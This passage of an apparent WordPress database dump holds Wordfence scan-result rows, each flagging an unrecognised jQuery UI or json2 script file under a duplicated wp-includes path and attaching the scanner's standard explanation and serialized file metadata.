More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27261,1631424915,1631424915,'new','knownfile',75,'3beaec3b5a2f0b45e7eb4ca4a4e2c474','1d794bbe410515ab48be8f5cffadd87d','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-puff.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-puff.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27262,1631424915,1631424915,'new','knownfile',75,'fd7e7499e938b752b4d9f56e01b658f0','ba2fcd013acda27d54e7cb2b214e38a8','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27263,1631424915,1631424915,'new','knownfile',75,'1d749fe4f9c5a5ed3d6efa122d932ab7','d10968b47511b5a78fc1da7cabf92647','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27264,1631424915,1631424915,'new','knownfile',75,'63dea87486beadb090f871e135a9fb40','239df9ba8c5081f3d0501194411b88f1','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27265,1631424915,1631424915,'new','knownfile',75,'823829a0506ce7c96a6159369a14434f','e2791bc4232932c55805ef75b7f8cae0','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-scale.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-scale.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27266,1631424915,1631424915,'new','knownfile',75,'001edd2bf592ce6fc07b016eb0d6f49f','f969ca9c9a3a782c50845b29322aae7e','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27267,1631424915,1631424915,'new','knownfile',75,'2b43040b5f09d480fb6cf2aaf3ce8a77','cd69d89d783c2cee9fcfabdbb1a02fa3','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-shake.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-shake.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27268,1631424915,1631424915,'new','knownfile',75,'761ab3e9dccc32851c30b541988e10db','f8b853b89d49d2cc2c95e982f69e103f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27269,1631424915,1631424915,'new','knownfile',75,'ead7e2d3e2f099d5dff63ac33f8adbba','f576ee98e1dbe56fada9c645ee9459b8','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-size.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-size.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27270,1631424915,1631424915,'new','knownfile',75,'b4b2a73070f49984e887923fa1288c65','27e1a423be544209d3a185c85a43cc05','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-size.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-size.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27271,1631424915,1631424915,'new','knownfile',75,'2c0ec6776b1c46eda86fd92e2dde0e01','e3e93d34ab7ca0fc64133c5817f8f638','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-slide.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-slide.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27272,1631424915,1631424915,'new','knownfile',75,'59541d2e552a655a1c13217ecfafe6e6','7760c1a7057094063ae2623804c11e0b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-slide.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-slide.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27273,1631424915,1631424915,'new','knownfile',75,'d17ec3b3feb307f36b13116fa740334f','8634ad0b57685a4efa16e9d5fccace51','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-transfer.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-transfer.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27274,1631424915,1631424915,'new','knownfile',75,'0a3461e10774bea0860f69a812b47bad','b32c85b6a675574fc9090cbc136e44fb','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27275,1631424915,1631424915,'new','knownfile',75,'3f8f2f536c3f4c138a26088ec7e3abee','4295577415455eecbf56a21ffa0c5403','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/effect.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27276,1631424916,1631424916,'new','knownfile',75,'f2dba2820ef254b26e051b0216fdcbd3','dfdbedac49227d2c5b6e40dbea3bbaea','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/effect.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27277,1631424916,1631424916,'new','knownfile',75,'d8b6e14d89ecd89629cc1d7c32d6de19','68c86b91a54c1ca9d80bbe72e562133a','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/menu.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/ui/menu.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27278,1631424916,1631424916,'new','knownfile',75,'38b7e14fa4d3902b65cddfb31867e909','f5f8d2041e07ed70dc79911dd666a065','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/menu.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/menu.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27279,1631424916,1631424916,'new','knownfile',75,'52b83048255af01bcfae1842d6812307','51bf87dc2ff80446572376ffdd9cd2ba','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/mouse.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/jquery/ui/mouse.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27280,1631424916,1631424916,'new','knownfile',75,'641642165826b4418bc10cff9b0419fe','4cdffbf9e33b2f0091a476ce5e95f71b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/mouse.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/mouse.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27281,1631424916,1631424916,'new','knownfile',75,'f4374507b78202be304a6063ed15999c','f5d2f6fc010607c91cd063e2780431c5','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/progressbar.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/progressbar.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27282,1631424916,1631424916,'new','knownfile',75,'407b678326de712fa4b02f19383d29bf','8b1874ef91202ff2e9c90501517f3d35','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/progressbar.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/progressbar.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27283,1631424916,1631424916,'new','knownfile',75,'cb28ed4171910e910be5ad74b8bc8037','200658f5ca557769d64e940f305eaa24','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/resizable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/resizable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27284,1631424916,1631424916,'new','knownfile',75,'8d30499da6725868ec5df6949f7b8729','0bdfd894b657364ccf03481371ec1295','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/resizable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/resizable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27285,1631424916,1631424916,'new','knownfile',75,'48aab31ffb48f6c1667292071da00476','c4cd85a530f47dfddd8f1e69e4843a23','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/selectable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27286,1631424916,1631424916,'new','knownfile',75,'28a42e3b5f278c068c1927a22bd87b9d','7d1cc87262a4ef5b01b9e5b470873e4e','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/selectable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27287,1631424916,1631424916,'new','knownfile',75,'505e8f6c02bca1710801ad88a4f9cceb','1c397eb375d1cf44272d27ed1dab56a6','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectmenu.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/selectmenu.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27288,1631424916,1631424916,'new','knownfile',75,'c0f88752630287842cf2fee1857ba8f8','2356f1fa723c03999ec05b9a0808d6fe','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27289,1631424916,1631424916,'new','knownfile',75,'6205b855f24b42abb06e5fe546290654','9e1b8353982cedd2f89111f89d33c35f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/slider.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/slider.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27290,1631424916,1631424916,'new','knownfile',75,'78b58d5d273aba9d010168faf594eee9','084c8e49c86f28581c955cfb81945df4','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/slider.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/slider.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27291,1631424916,1631424916,'new','knownfile',75,'08687c95cd90dbc7092be84da526d700','88f3e12e0e3704e73eca326b346d41c8','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/sortable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/sortable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27292,1631424917,1631424917,'new','knownfile',75,'e80a35311e295fcbaad37c10484a4e46','0af01c6bcaaeb7666c71a8d06ff83483','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/sortable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/sortable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27293,1631424917,1631424917,'new','knownfile',75,'b9d798081425c03498eb7c46360d9275','22698cc531b1fb667c8525e7cb9150fa','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/spinner.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/jquery/ui/spinner.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27294,1631424917,1631424917,'new','knownfile',75,'f5f040bea0307feda7250c2bed096c79','54ae213bf1131214b4204c570c3496eb','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/spinner.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/spinner.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27295,1631424917,1631424917,'new','knownfile',75,'725c53b589a27db6b6ae9471866fd388','8135c650ecc17c3eb5fe9ee1e2b36d84','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tabs.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/ui/tabs.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27296,1631424917,1631424917,'new','knownfile',75,'af0fb60c362580d25bfd5972816bfa58','85b14e4757b78422d08063ee502581cd','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tabs.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/tabs.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27297,1631424917,1631424917,'new','knownfile',75,'c9a3ef6ff6604cdcc241c040b2a90f94','c80cc88dd738eab53897f0a9c2deeb81','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tooltip.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/jquery/ui/tooltip.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27298,1631424917,1631424917,'new','knownfile',75,'9ef6cbaf917a4a38742cce1bcf61cf6b','7dd5a460a7af799f7b193da7702d1962','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tooltip.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/tooltip.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27299,1631424917,1631424917,'new','knownfile',75,'42efe3f9b29789eaa6da310f705fe62a','4d498491d8598d06ac8020c7475fadfc','Unknown file in WordPress core: wp-includes/wp-includes/js/json2.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/js/json2.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27300,1631424917,1631424917,'new','knownfile',75,'056fa86d583a8d41e20f54d1d9b95543','4e35bd04609c01e0ae64934111bd8cb0','Unknown file in WordPress 